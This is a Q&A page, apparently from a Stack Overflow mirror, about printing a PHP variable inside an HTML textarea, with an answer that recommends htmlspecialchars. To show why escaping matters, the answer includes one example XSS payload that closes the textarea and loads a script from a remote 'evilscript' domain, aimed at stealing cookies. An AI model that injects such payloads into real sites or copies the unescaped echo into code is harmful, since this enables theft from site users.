Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

Display PHP query result in textarea

Tags:

php

textarea

I'm having a little problem over here, I'm trying to make a news system with an edit button, it's all going great but I'm having problems with the "textarea", I can display the results on inputs but when I try to display them in a textarea it wont, look:

This code works perfectly:

<input name="txt_02" size="87" maxlength="100" id="txt_Resumen" maxlength="140"  value="<?php echo $not_Resumen?>"/>

This wont:

<textarea name="txt_descripcion" cols="66" rows="10" id="txt_descripcion"  value="<?php echo $not_Contenido ?>">
</textarea>

I tried with $not_Resumen and other ones in the textarea and it doesn't work, the textarea would show up empty without the text, it should be a little mistake I'm making but I can't find it. Thanks.

like image 293
Héctor Rivera Avatar asked Jul 16 '13 04:07

Héctor Rivera


1 Answers

Just put it within ><, there's no value attribute:

<textarea name="txt_descripcion" cols="66" rows="10" id="txt_descripcion"><?php echo htmlspecialchars($not_Contenido);?></textarea>

You should also use htmlspecialchars so that the textarea will not break if $not_Contenido contains </textarea>.

This is sometimes overlooked, but if $not_Contenido contained something like:

</textarea><script src="http://remotedomain.com/evilscript.js"></script>

An attacker can run anything they want, and all your clients will download and run the script on your website. A common attack would be sending cookies to their domain.

like image 101
Dave Chen Avatar answered Sep 18 '22 17:09

Dave Chen